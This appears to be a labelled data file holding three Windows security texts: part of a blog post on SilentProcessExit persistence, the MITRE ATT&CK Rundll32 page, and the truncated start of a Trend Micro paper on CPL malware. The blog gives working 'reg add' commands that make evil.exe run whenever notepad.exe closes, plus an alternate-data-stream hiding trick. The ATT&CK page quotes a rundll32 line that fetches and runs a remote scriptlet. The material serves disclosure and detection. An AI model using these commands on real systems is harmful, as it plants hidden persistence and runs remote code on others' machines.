operating system you are running to a process. I am not done researching the ApplicationGoo, so feel free to go on your own adventure. \xf0\x9f\x98\x89 I returned to read some more details about the GlobalFlags, since that was more interesting. The MSDN blog stated the following (Thanks Microsoft): If you play with gflags.exe more, you will found more interesting registry values under Image File Execution Options. A quick search for gflags.exe and I found that this is a part of the Windows 10 SDK, and this binary was already present on my machine. I fired up the application and it looks like this: This application can be used to change all the flags related to the execution of a binary. Here could also be more interesting stuff to dig into that I have not looked at yet. The first thing I tried was to check if this Application could work as a Device Guard bypass by leveraging the Launch command. This turned out to be negative. Based on my previous experience I already knew what the debugger flag does so I did not care about that. What I however found out was that under the \xe2\x80\x9cSilent Process Exit\xe2\x80\x9d tab there was a lot of other interesting stuff to look at.\xc2 \xf0\x9f\x98\x88 As you can see, my evil plan here is to execute an evil binary every time notepad.exe is closed. After planting this I verified that it worked by running just a renamed version of bginfo.exe. The point here is not the payload I am running, more the technique. After I close notepad.exe evil.exe is spawned like this: So this was pretty awesome I thought. It also turns out that autoruns.exe does not detect this technique. (Sorry Mark, even more to do with autoruns.exe) \xc2 After a bit more reversing I also figured out that the registry keys that decides what to launch as a silent \xe2\x80\x9cmonitor\xe2\x80\x9d resides in \xe2\x80\x9cHKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\\xe2\x80\x9d All that gflags.exe does is actually only write the registry keys necessary. To achieve the same with some simple commands you could simply run the following lines in cmd. reg add ""HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\notepad.exe"" /v GlobalFlag /t REG_DWORD /d 512 reg add ""HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\notepad.exe"" /v ReportingMode /t REG_DWORD /d 1 reg add ""HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\notepad.exe"" /v MonitorProcess /d ""C:\\temp\\evil.exe"" This is also pretty good documented at docs.microsoft.com. \xc2 \xc2 BONUS \xe2\x80\x93 Execute with Alternate data streams Also figured out that you can leverage alternate data streams as well. That means you can take the evil.exe and add it to for instance the tasks folder under C:\\windows\\ as an alternate stream. That can easily be done by changing the registry and using this command: type c:\\temp\\evil.exe > c:\\windows\\tasks:evil.exe \xc2 After I close notepad, it now looks like this: \xc2 I\xe2\x80\x99ve got asked by some people since my last post on why I disclose these things, and my attentions are pure. Many people fear that this is like giving away techniques to the bad guys, but I feel disclosing these things makes is possible to discover them in the wild and create good detection mechanisms and prevention. I have also seen a lot of discussions on Twitter lately about people not wanting to disclose their techniques since it makes their job more difficult (pentesters) and that makes me sad in some way even though I can understand and relate to the reasons. My reasons for sharing things I discover is to make things more secure for everyone and hopefully it will also inspire others to start their own research and disclose new and unknown stuff to the public.\xc2 Hope you enjoyed the post and as always, feedback is always welcome! \xc2 Share this: Twitter Facebook Like this: Like Loading... Related Tagged autoruns, persistence, research, security Post navigation Previous Post Persistence using RunOnceEx \xe2\x80\x93 Hidden from\xc2 Autoruns.exe Next Post Putting data in Alternate data streams and how to execute it \xe2\x80\x93 part\xc2 2 4 thoughts on \xe2\x80\x9cPersistence using GlobalFlags in Image File Execution Options \xe2\x80\x93 Hidden from\xc2 Autoruns.exe\xe2\x80\x9d Dan says: 11 Apr 2018 at 1:16 pm Interesting article. There is an additional method for persistence that I haven\xe2\x80\x99t seen anyone check for which also requires admin rights. The initial functionality is for process debugging and is enabled in a similar fashion. It basically allow you to run something prior the \xe2\x80\x9cdebugged\xe2\x80\x9d process starting with the purpose of debugging attachment. I remember reading about the functionality at some point in a book and wondering why nobody uses this as a persistence method. I know I tested it and it worked like a charm. I don\xe2\x80\x99t rememeber the details but I do believe it was something similar to: https://support.microsoft.com/en-us/help/824344/how-to-debug-windows-services Section: Configure a service to start with the WinDbg debugger attached method 2 Cheers! LikeLike Reply Oddvar Moe [MVP] says: 11 Apr 2018 at 2:23 pm I think you are thinking about debugger that you can set in registry. This has been known for many years and malware use it all the time. Even process explorer uses this technique if you choose to change it to the default task manager. LikeLike Reply Pingback: Week 15 \xe2\x80\x93 2018 \xe2\x80\x93 This Week In 4n6 Stratcat says: 27 Dec 2018 at 1:41 pm This has been around for a long time and any developer worth a damn knows about it. I think you\xe2\x80\x99re safe in sharing and linking to the MSDN documents that describe its usage. LikeLike Reply Leave a Reply Cancel reply Enter your comment here... Fill in your details below or click an icon to log in: Email (required) (Address never made public) Name (required) Website You are commenting using your WordPress.com account. (\xc2 Log\xc2 Out\xc2 /\xc2 Change\xc2 ) You are commenting using your Google account. (\xc2 Log\xc2 Out\xc2 /\xc2 Change\xc2 ) You are commenting using your Twitter account. (\xc2 Log\xc2 Out\xc2 /\xc2 Change\xc2 ) You are commenting using your Facebook account. (\xc2 Log\xc2 Out\xc2 /\xc2 Change\xc2 ) Cancel Connecting to %s Notify me of new comments via email. Notify me of new posts via email. This site uses Akismet to reduce spam. Learn how your comment data is processed. Facebook LinkedIn Twitter Search for: Powered by WordPress.com. Post to Cancel %d bloggers like this:","0","0","0","1","1","0","1","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","1","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0"
-"Rundll32 - Enterprise | MITRE ATT&CK\xe2\x84\xa2 Matrices Tactics PRE-ATT&CK Enterprise Mobile Techniques PRE-ATT&CK Enterprise Mobile Mitigations Enterprise Mobile Groups Software Resources General Information Getting Started ATT&CKcon Working with ATT&CK FAQ Updates Previous Versions Related Projects Blog\xc2 Contribute Register to stream ATT&CKcon 2.0 October 29-30 ENTERPRISE ENTERPRISE MOBILE PRE-ATT&CK TECHNIQUES All Initial Access Drive-by Compromise Exploit Public-Facing Application External Remote Services Hardware Additions Replication Through Removable Media Spearphishing Attachment Spearphishing Link Spearphishing via Service Supply Chain Compromise Trusted Relationship Valid Accounts Execution AppleScript CMSTP Command-Line Interface Compiled HTML File Control Panel Items Dynamic Data Exchange Execution through API Execution through Module Load Exploitation for Client Execution Graphical User Interface InstallUtil Launchctl Local Job Scheduling LSASS Driver Mshta PowerShell Regsvcs/Regasm Regsvr32 Rundll32 Scheduled Task Scripting Service Execution Signed Binary Proxy Execution Signed Script Proxy Execution Source Space after Filename Third-party Software Trap Trusted Developer Utilities User Execution Windows Management Instrumentation Windows Remote Management XSL Script Processing Persistence .bash_profile and .bashrc Accessibility Features Account Manipulation AppCert DLLs AppInit DLLs Application Shimming Authentication Package BITS Jobs Bootkit Browser Extensions Change Default File Association Component Firmware Component Object Model Hijacking Create Account DLL Search Order Hijacking Dylib Hijacking External Remote Services File System Permissions Weakness Hidden Files and Directories Hooking Hypervisor Image File Execution Options Injection Kernel Modules and Extensions Launch Agent Launch Daemon Launchctl LC_LOAD_DYLIB Addition Local Job Scheduling Login Item Logon Scripts LSASS Driver Modify Existing Service Netsh Helper DLL New Service Office Application Startup Path Interception Plist Modification Port Knocking Port Monitors Rc.common Re-opened Applications Redundant Access Registry Run Keys / Startup Folder Scheduled Task Screensaver Security Support Provider Service Registry Permissions Weakness Setuid and Setgid Shortcut Modification SIP and Trust Provider Hijacking Startup Items System Firmware Systemd Service Time Providers Trap Valid Accounts Web Shell Windows Management Instrumentation Event Subscription Winlogon Helper DLL Privilege Escalation Access Token Manipulation Accessibility Features AppCert DLLs AppInit DLLs Application Shimming Bypass User Account Control DLL Search Order Hijacking Dylib Hijacking Exploitation for Privilege Escalation Extra Window Memory Injection File System Permissions Weakness Hooking Image File Execution Options Injection Launch Daemon New Service Path Interception Plist Modification Port Monitors Process Injection Scheduled Task Service Registry Permissions Weakness Setuid and Setgid SID-History Injection Startup Items Sudo Sudo Caching Valid Accounts Web Shell Defense Evasion Access Token Manipulation Binary Padding BITS Jobs Bypass User Account Control Clear Command History CMSTP Code Signing Compile After Delivery Compiled HTML File Component Firmware Component Object Model Hijacking Control Panel Items DCShadow Deobfuscate/Decode Files or Information Disabling Security Tools DLL Search Order Hijacking DLL Side-Loading Execution Guardrails Exploitation for Defense Evasion Extra Window Memory Injection File Deletion File Permissions Modification File System Logical Offsets Gatekeeper Bypass Group Policy Modification Hidden Files and Directories Hidden Users Hidden Window HISTCONTROL Image File Execution Options Injection Indicator Blocking Indicator Removal from Tools Indicator Removal on Host Indirect Command Execution Install Root Certificate InstallUtil Launchctl LC_MAIN Hijacking Masquerading Modify Registry Mshta Network Share Connection Removal NTFS File Attributes Obfuscated Files or Information Plist Modification Port Knocking Process Doppelg\xc3\xa4nging Process Hollowing Process Injection Redundant Access Regsvcs/Regasm Regsvr32 Rootkit Rundll32 Scripting Signed Binary Proxy Execution Signed Script Proxy Execution SIP and Trust Provider Hijacking Software Packing Space after Filename Template Injection Timestomp Trusted Developer Utilities Valid Accounts Virtualization/Sandbox Evasion Web Service XSL Script Processing Credential Access Account Manipulation Bash History Brute Force Credential Dumping Credentials in Files Credentials in Registry Exploitation for Credential Access Forced Authentication Hooking Input Capture Input Prompt Kerberoasting Keychain LLMNR/NBT-NS Poisoning and Relay Network Sniffing Password Filter DLL Private Keys Securityd Memory Two-Factor Authentication Interception Discovery Account Discovery Application Window Discovery Browser Bookmark Discovery Domain Trust Discovery File and Directory Discovery Network Service Scanning Network Share Discovery Network Sniffing Password Policy Discovery Peripheral Device Discovery Permission Groups Discovery Process Discovery Query Registry Remote System Discovery Security Software Discovery System Information Discovery System Network Configuration Discovery System Network Connections Discovery System Owner/User Discovery System Service Discovery System Time Discovery Virtualization/Sandbox Evasion Lateral Movement AppleScript Application Deployment Software Distributed Component Object Model Exploitation of Remote Services Logon Scripts Pass the Hash Pass the Ticket Remote Desktop Protocol Remote File Copy Remote Services Replication Through Removable Media Shared Webroot SSH Hijacking Taint Shared Content Third-party Software Windows Admin Shares Windows Remote Management Collection Audio Capture Automated Collection Clipboard Data Data from Information Repositories Data from Local System Data from Network Shared Drive Data from Removable Media Data Staged Email Collection Input Capture Man in the Browser Screen Capture Video Capture Command and Control Commonly Used Port Communication Through Removable Media Connection Proxy Custom Command and Control Protocol Custom Cryptographic Protocol Data Encoding Data Obfuscation Domain Fronting Domain Generation Algorithms Fallback Channels Multi-hop Proxy Multi-Stage Channels Multiband Communication Multilayer Encryption Port Knocking Remote Access Tools Remote File Copy Standard Application Layer Protocol Standard Cryptographic Protocol Standard Non-Application Layer Protocol Uncommonly Used Port Web Service Exfiltration Automated Exfiltration Data Compressed Data Encrypted Data Transfer Size Limits Exfiltration Over Alternative Protocol Exfiltration Over Command and Control Channel Exfiltration Over Other Network Medium Exfiltration Over Physical Medium Scheduled Transfer Impact Data Destruction Data Encrypted for Impact Defacement Disk Content Wipe Disk Structure Wipe Endpoint Denial of Service Firmware Corruption Inhibit System Recovery Network Denial of Service Resource Hijacking Runtime Data Manipulation Service Stop Stored Data Manipulation Transmitted Data Manipulation Home Techniques Enterprise Rundll32 Rundll32 The rundll32.exe program can be called to execute an arbitrary binary. Adversaries may take advantage of this functionality to proxy execution of code to avoid triggering security tools that may not monitor execution of the rundll32.exe process because of whitelists or false positives from Windows using rundll32.exe for normal operations. Rundll32.exe can be used to execute Control Panel Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL and Control_RunDLLAsUser. Double-clicking a .cpl file also causes rundll32.exe to execute. [1] Rundll32 can also been used to execute scripts such as JavaScript. This can be done using a syntax similar to this: rundll32.exe javascript:""..\\mshtml,RunHTMLApplication "";document.write();GetObject(""script:https[:]//www[.]example[.]com/malicious.sct"")"" This behavior has been seen used by malware such as Poweliks. [2] ID:\xc2 T1085 Tactic: Defense Evasion, Execution Platform:\xc2 Windows Permissions Required:\xc2 User Data Sources:\xc2 File monitoring, Process monitoring, Process command-line parameters, Binary file metadata Defense Bypassed:\xc2 Anti-virus, Application whitelisting, Digital Certificate Validation Contributors:\xc2 Ricardo Dias; Casey Smith Version:\xc2 1.1 Mitigations Mitigation Description Exploit Protection Microsoft's Enhanced Mitigation Experience Toolkit (EMET) Attack Surface Reduction (ASR) feature can be used to block methods of using rundll32.exe to bypass whitelisting. Examples Name Description ADVSTORESHELL ADVSTORESHELL has used rundll32.exe in a Registry value to establish persistence. [23] APT19 APT19 configured its payload to inject into the rundll32.exe. [34] APT28 APT28 executed CHOPSTICK by using rundll32 commands such as rundll32.exe \xe2\x80\x9cC:\\Windows\\twain_64.dll\xe2\x80\x9d. APT28 also executed a .dll for a first stage dropper using rundll32.exe. An APT28 loader Trojan saved a batch script that uses rundll32 to execute a DLL payload. [35] [23] [36] [37] [38] APT29 APT29 has used rundll32.exe for execution. [42] APT3 APT3 has a tool that can run DLLs. [39] Bisonal Bisonal uses rundll32.exe to execute as part of the Registry Run key it adds: HKEY_CURRENT_USER \\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\\xe2\x80\x9dvert\xe2\x80\x9d = \xe2\x80\x9crundll32.exe c:\\windows\\temp\\pvcu.dll , Qszdez\xe2\x80\x9d. [5] Briba Briba uses rundll32 within Registry Run Keys / Startup Folder entries to execute malicious DLLs. [8] Carbanak Carbanak installs VNC server software that executes through rundll32. [41] Comnie Comnie uses Rundll32 to load a malicious DLL. [16] CopyKittens CopyKittens uses rundll32 to load various tools on victims, including a lateral movement tool named Vminst, Cobalt Strike, and shellcode. [33] CORESHELL CORESHELL is installed via execution of rundll32 with an export named ""init"" or ""InitW."" [30] CozyCar The CozyCar dropper copies the system file rundll32.exe to the install location for the malware, then uses the copy of rundll32.exe to load and execute the main CozyCar component. [28] DDKONG DDKONG uses Rundll32 to ensure only a single instance of itself is running at once. [4] Elise After copying itself to a DLL file, a variant of Elise calls the DLL file using rundll32.exe. [15] Emissary Variants of Emissary have used rundll32.exe in Registry values added to establish persistence. [18] FELIXROOT FELIXROOT uses Rundll32 for executing the dropper program. [19] [20] Flame Rundll32.exe is used as a way of executing Flame at the command-line. [12] gh0st RAT A gh0st RAT variant has used rundll32 for execution. [29] GreyEnergy GreyEnergy uses PsExec locally in order to execute rundll32.exe at the highest privileges (NTAUTHORITY\\SYSTEM). [20] JHUHUGIT JHUHUGIT is executed using rundll32.exe. [13] [14] Koadic Koadic can use Rundll32 to execute additional payloads. [3] Kwampirs Kwampirs uses rundll32.exe in a Registry value added to establish persistence. [27] Matroyshka Matroyshka uses rundll32.exe in a Registry Run key value for execution as part of its persistence mechanism. [6] Mosquito Mosquito's launcher uses rundll32.exe in a Registry Key value to start the main backdoor capability. [26] MuddyWater MuddyWater has used malware that leveraged rundll32.exe in a Registry Run key to execute a .dll. [40] NOKKI NOKKI has used rundll32 for execution. [22] NotPetya NotPetya uses rundll32.exe to install itself on remote systems when accessed via PsExec or wmic. [31] PowerDuke PowerDuke uses rundll32.exe to load. [21] Prikormka Prikormka uses rundll32.exe to load its DLL. [25] Pteranodon Pteranodon executes functions using rundll32.exe. [7] PUNCHBUGGY PUNCHBUGGY can load a DLL using Rundll32. [9] RTM RTM runs its core DLL file using rundll32.exe. [24] Sakula Sakula calls cmd.exe to run various DLL files via rundll32. [10] ServHelper ServHelper contains a module for downloading and executing DLLs that leverages rundll32.exe. [32] StreamEx StreamEx uses rundll32 to call an exported function. [11] TA505 TA505 has leveraged rundll32.exe to execute malicious DLLs. [43] [32] Winnti The Winnti installer loads a DLL using rundll32. [17] Detection Use process monitoring to monitor the execution and arguments of rundll32.exe. Compare recent invocations of rundll32.exe with prior history of known good arguments and loaded DLLs to determine anomalous and potentially adversarial activity. Command arguments used with the rundll32.exe invocation may also be useful in determining the origin and purpose of the DLL being loaded. References Merces, F. (2014). CPL Malware Malicious Control Panel Items. Retrieved November 1, 2017. B. Ancel. (2014, August 20). Poweliks \xe2\x80\x93 Command Line Confusion. Retrieved March 5, 2018. Magius, J., et al. (2017, July 19). Koadic. Retrieved June 18, 2018. Ash, B., et al. (2018, June 26). RANCOR: Targeted Attacks in South East Asia Using PLAINTEE and DDKONG Malware Families. Retrieved July 2, 2018. Hayashi, K., Ray, V. (2018, July 31). Bisonal Malware Used in Attacks Against Russia and South Korea. Retrieved August 7, 2018. Minerva Labs LTD and ClearSky Cyber Security. (2015, November 23). CopyKittens Attack Group. Retrieved September 11, 2017. Kasza, A. and Reichel, D.. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017. Ladley, F. (2012, May 15). Backdoor.Briba. Retrieved February 21, 2018. Elovitz, S. & Ahl, I. (2016, August 18). Know Your Enemy: New Financially-Motivated & Spear-Phishing Group. Retrieved February 26, 2018. Dell SecureWorks Counter Threat Unit Threat Intelligence. (2015, July 30). Sakula Malware Family. Retrieved January 26, 2016. Cylance SPEAR Team. (2017, February 9). Shell Crew Variants Continue to Fly Under Big AV\xe2\x80\x99s Radar. Retrieved February 15, 2017. sKyWIper Analysis Team. (2012, May 31). sKyWIper (a.k.a. Flame a.k.a. Flamer): A complex malware for targeted attacks. Retrieved September 6, 2018. F-Secure. (2015, September 8). Sofacy Recycles Carberp and Metasploit Code. Retrieved August 3, 2016. Mercer, W., et al. (2017, October 22). ""Cyber Conflict"" Decoy Document Used in Real Cyber Conflict. Retrieved November 2, 2018. Falcone, R., et al.. (2015, June 16). Operation Lotus Blossom. Retrieved February 15, 2016. Grunzweig, J. (2018, January 31). Comnie Continues to Target Organizations in East Asia. Retrieved June 7, 2018. Cap, P., et al. (2017, January 25). Detecting threat actors in recent German industrial attacks with Windows Defender ATP. Retrieved February 8, 2017. Falcone, R. and Miller-Osborn, J.. (2016, February 3). Emissary Trojan Changelog: Did Operation Lotus Blossom Cause It to Evolve?. Retrieved February 15, 2016. Patil, S. (2018, June 26). Microsoft Office Vulnerabilities Used to Distribute FELIXROOT Backdoor in Recent Campaign. Retrieved July 31, 2018. Cherepanov, A. (2018, October). GREYENERGY A successor to BlackEnergy. Retrieved November 15, 2018. Adair, S.. (2016, November 9). PowerDuke: Widespread Post-Election Spear Phishing Campaigns Targeting Think Tanks and NGOs. Retrieved January 11, 2017. Grunzweig, J., Lee, B. (2018, September 27). New KONNI Malware attacking Eurasia and Southeast Asia. Retrieved November 5, 2018. Bitdefender. (2015, December). APT28 Under the Scope. Retrieved February 23, 2017. Faou, M. and Boutin, J.. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017. Cherepanov, A.. (2016, May 17). Operation Groundbait: Analysis of a surveillance toolkit. Retrieved May 18, 2016. ESET, et al. (2018, January). Diplomats in Eastern Europe bitten by a Turla mosquito. Retrieved July 3, 2018. Symantec Security Response Attack Investigation Team. (2018, April 23). New Orangeworm attack group targets the healthcare sector in the U.S., Europe, and Asia. Retrieved May 8, 2018. F-Secure Labs. (2015, April 22). CozyDuke: Malware Analysis. Retrieved December 10, 2015. Sabo, S. (2018, February 15). Musical Chairs Playing Tetris. Retrieved February 19, 2018. Anthe, C. et al. (2015, October 19). Microsoft Security Intelligence Report Volume 19. Retrieved December 23, 2015. Chiu, A. (2016, June 27). New Ransomware Variant ""Nyetya"" Compromises Systems Worldwide. Retrieved March 26, 2019. Vilkomir-Preisman, S. (2019, April 2). New ServHelper Variant Employs Excel 4.0 Macro to Drop Signed Payload. Retrieved May 28, 2019. ClearSky Cyber Security and Trend Micro. (2017, July). Operation Wilted Tulip: Exposing a cyber espionage apparatus. Retrieved August 21, 2017. Ahl, I. (2017, June 06). Privileges and Credentials: Phished at the Request of Counsel. Retrieved May 17, 2018. Alperovitch, D.. (2016, June 15). Bears in the Midst: Intrusion into the Democratic National Committee. Retrieved August 3, 2016. Lee, B., Falcone, R. (2018, June 06). Sofacy Group\xe2\x80\x99s Parallel Attacks. Retrieved June 18, 2018. Unit 42. (2017, December 15). Unit 42 Playbook Viewer. Retrieved December 20, 2017. ESET Research. (2019, May 22). A journey to Zebrocy land. Retrieved June 20, 2019. Chen, X., Scott, M., Caselden, D.. (2014, April 26). New Zero-Day Exploit targeting Internet Explorer Versions 9 through 11 Identified in Targeted Attacks. Retrieved January 14, 2016. Kaspersky Lab's Global Research & Analysis Team. (2018, October 10). MuddyWater expands operations. Retrieved November 2, 2018. Kaspersky Lab's Global Research and Analysis Team. (2015, February). CARBANAK APT THE GREAT BANK ROBBERY. Retrieved August 23, 2018. Dunwoody, M., et al. (2018, November 19). Not So Cozy: An Uncomfortable Examination of a Suspected APT29 Phishing Campaign. Retrieved November 27, 2018. Salem, E. (2019, April 25). Threat Actor TA505 Targets Financial Enterprises Using LOLBins and a New Backdoor Malware. Retrieved May 28, 2019. Copyright \xc2\xa9 2015-2019, The MITRE Corporation. MITRE ATT&CK and ATT&CK are trademarks of The MITRE Corporation. Privacy Policy Terms of Use @MITREattack Contact","0","1","0","0","0","0","1","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","1","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0"
-"CPL Malware: Malicious Control Panel Items A Trend Micro Research Paper CPL Malware Malicious Control Panel Items Fernando Merc\xc3\xaas Forward-Looking Threat Research Team Trend Micro | CPL Malware TREND MICRO LEGAL DISCLAIMER The information provided herein is for general information and educational purposes only. It is not intended and should not be construed to constitute legal advice. The information contained herein may not be applicable to all situations and may not reflect the most current situation. Nothing contained herein should be relied on or acted upon without the benefit of legal advice based on the particular facts and circumstances presented and nothing herein should be construed otherwise. Trend Micro reserves the right to modify the contents of this document at any time without prior notice. Translations of any material into other languages are intended solely as a convenience. Translation accuracy is not guaranteed nor implied. If any questions arise related to the accuracy of a translation, please refer to the original language official version of the document. Any discrepancies or differences created in the translation are not binding and have no legal effect for compliance or enforcement purposes. Although Trend Micro uses reasonable efforts to include accurate and up-to-date information herein, Trend Micro makes no warranties or representations of any kind as to its accuracy, currency, or completeness. You agree that access to and use of and reliance on this document and the content thereof is at your own risk. Trend Micro disclaims all warranties of any kind, express or implied. Neither Trend Micro nor any party involved in creating, producing, or delivering this document shall be liable for any consequence, loss, or damage, including direct, indirect, special, consequential, loss of business profits, or special damages, whatsoever arising out of access to, use of, or inability to use, or in connection with the use of this document, or any errors or omissions in the content thereof. Use of this information constitutes acceptance for use in an \xe2\x80\x9cas is\xe2\x80\x9d condition. Contents Introduction ....................................................................................................................................3 Attack Overview.............................................................................................................................3 .CPL File Format ...........................................................................................................................6 .CPL Launch Process ........................................................................................................6 Analyzing .CPL Files ...................................................................................................................10 Static Analysis ..................................................................................................................10 Dynamic Analysis .............................................................................................................11 How Cybercriminals Use .CPL Files ............................................................................................13 Brazil ................................................................................................................................13 Worldwide ........................................................................................................................15 Conclusion ...................................................................................................................................16 Appendix......................................................................................................................................16 OSs That Support .CPL File Execution ............................................................................16 Top 20 Words Associated with CPL Banking Trojans ......................................................17 Trend Micro | CPL Malware 1 Introduction .CPL is an executable file format that cybercriminals use to create malware these days. Nonmalicious .CPL files, of course, exist but this research paper will focus on malicious ones, which Trend Micro calls \xe2\x80\x9cCPL malware.\xe2\x80\x9d We decided to explore this topic due to the growing number of CPL malware currently being created and distributed today, especially in Brazil. These have been primarily targeting online banking customers. Attack Overview Brazil is a well-known producer and target of banking Trojans, more popularly known as \xe2\x80\x9cbankers\xe2\x80\x9d in the country. Based on partner reports, an average of 40 new malware target Brazilian banking customers per day. To evade common detection techniques, cybercriminals seem to follow these steps when launching CPL Trojan attacks: 1. Send a phishing email to potential victims. The emails use the names of popular financial organizations to induce potential victims to click a link to download a payment receipt or see their debt balances. 2. Victims download a .ZIP file by clicking a link embedded in the email. Cybercriminals use shortened links that, when clicked, downloads a compressed .CPL file onto the victims\xe2\x80\x99 computers. And because recent Windows\xc2\xae versions are distributed with native decompression programs, users can easily open the attached file. The said .ZIP file contains .CPL files with specially chosen names to better fool users into thinking they are legitimate. These names include the following Brazilian and Portuguese words (see the Appendix for a list of the top CPL Trojan-related words): \xe2\x80\xa2 Boleto/Fatura: Invoice \xe2\x80\xa2 NF-e: Acronym for \xe2\x80\x9celectronic receipt\xe2\x80\x9d short for \xe2\x80\x9cnota fiscal eletronica\xe2\x80\x9d \xe2\x80\xa2 Nota/Recibo: Printed receipt \xe2\x80\xa2 SPC: Organization responsible for protecting companies from defaulters or customers who fail to pay their debts \xe2\x80\xa2 Serasa: Organization exclusively responsible for protecting banks from defaulters Figure 1: Sample malicious .CPL file Trend Micro | CPL Malware 2 Figure 2: .CPL files found in a .ZIP file that Windows natively opens 3. Victims execute the .CPL file. Double-clicking the .CPL file can have several payloads. Most .CPL files drop new banking Trojan variants onto victims\xe2\x80\x99 computers but some also contain malicious code. Figure 3: How CPL malware work Trend Micro | CPL Malware 3 Figure 4: Phishing email accusing the recipient of being a defaulter with a link that, when clicked, downloads a TROJ_BANLOAD variant1 Even though .CPL files are quite common, security analysts and the security industry in general know very little about them.2 Even Microsoft\xe2\x80\x99s official documentation contains only a few pages on the .CPL file format. Most of the technical information in this paper was likely obtained by reverse- engineering .CPL files, Windows loaders, and the like. 1 Trend Micro Incorporated. (2014). Threat Encyclopedia. \xe2\x80\x9cTROJ_BANLOAD.\xe2\x80\x9d Last accessed January 7, 2014, http://about-threats. trendmicro.com/us/search.aspx?p=TROJ_BANLOAD. 2 Microsoft. (2014). Windows Dev Center\xe2\x80\x94Desktop. \xe2\x80\x9cImplementing Control Panel Items.\xe2\x80\x9d Last accessed January 17, 2014, http:// msdn.microsoft.com/en-us/library/windows/desktop/cc144185%28v=vs.85%29.aspx. http://about-threats.trendmicro.com/us/search.aspx?p=TROJ_BANLOAD http://about-threats.trendmicro.com/us/search.aspx?p=TROJ_BANLOAD http://msdn.microsoft.com/en-us/library/windows/desktop/cc144185%28v=vs.85%29.aspx http://msdn.microsoft.com/en-us/library/windows/desktop/cc144185%28v=vs.85%29.aspx Trend Micro | CPL Malware 4 .CPL File Format .CPL is the file name extension for Control Panel items or the icons that appear in the Windows Control Panel.3 Each item or icon in the Windows Control Panel is used to configure a system. Windows applications host CPL applets or the miniprograms each Control Panel icon launches. Since Windows 3.x, some .CPL files were distributed with the OS although programmers can also create their own .CPL files for use with their programs. In a nutshell, a .CPL file is a dynamic link library (.DLL) file that:4 \xe2\x80\xa2 Uses .CPL as file name extension instead of .DLL \xe2\x80\xa2 Exports a function known as \xe2\x80\x9cCPlApplet\xe2\x80\x9d5 \xe2\x80\xa2 Hosts one or more CPL applets \xe2\x80\xa2 Handles the special messages the CPlApplet caller sends Double-clicking a .DLL file does not result in anything because regular .DLL files need to be loaded by a program. Double-clicking a .CPL file on Windows, however, automatically loads an application. .CPL Launch Process .CPL files can be loaded in Windows via different methods. First, a user can manually call a .CPL file using the command-line interface, the main Control Panel executable file or control.exe, by typing the following: control.exe file.cpl,@n,t In the syntax above, n refers to the applet index inside file.cpl while t refers to the tab index used in multitabbed applets. If you were to open second tab of the first applet in main.cpl, the file used to configure mouse properties on Control Panel, you can type the following in the command-line interface: control.exe main.cpl,@0,1 3 Microsoft. (2014). Microsoft Support. \xe2\x80\x9cDescription of Control Panel (.CPL) Files.\xe2\x80\x9d Last accessed January 7, 2014, http://support. microsoft.com/kb/149648. 4 Microsoft. (2014). Microsoft Support. \xe2\x80\x9cWhat Is a DLL?\xe2\x80\x9d Last accessed January 7, 2014, https://support.microsoft.com/kb/815065. 5 Microsoft. (2014). Windows | Dev Center \xe2\x80\x94 Desktop. \xe2\x80\x9cCPlApplet Entry Point.\xe2\x80\x9d Last accessed January 7, 2014, http://msdn. microsoft.com/en-us/library/windows/desktop/bb776392(v=vs.85).aspx. http://support.microsoft.com/kb/149648 http://support.microsoft.com/kb/149648 https://support.microsoft.com/kb/815065 http://msdn.microsoft.com/en-us/library/windows/desktop/bb776392(v=vs.85).aspx http://msdn.microsoft.com/en-us/library/windows/desktop/bb776392(v=vs.85).aspx Trend Micro | CPL Malware 5 The command above will open the following window: Figure 5: Applet\xe2\x80\x99s second tab opened by control.exe A user can also load a .CPL file using a VBScript such as the following: Dim obj Set obj = CreateObject(\xe2\x80\x9cShell.Application\xe2\x80\x9d) obj.ControlPanelItem(\xe2\x80\x9cjoy.cpl\xe2\x80\x9d) The shell object has a built-in ControlPanelItem method that runs the specified Control Panel (*.cpl) application. If the application is already open, it will activate the running instance instead. Trend Micro | CPL Malware 6 The loading methods discussed above are, however, manual and may not be favored by malware creators. As such, most .CPL files are automatically loaded when double- clicked. Windows has undocumented functions like \xe2\x80\x9cControl_RunDLL\xe2\x80\x9d and \xe2\x80\x9cControl_ RunDLLAsUser\xe2\x80\x9d in shell32.dll that 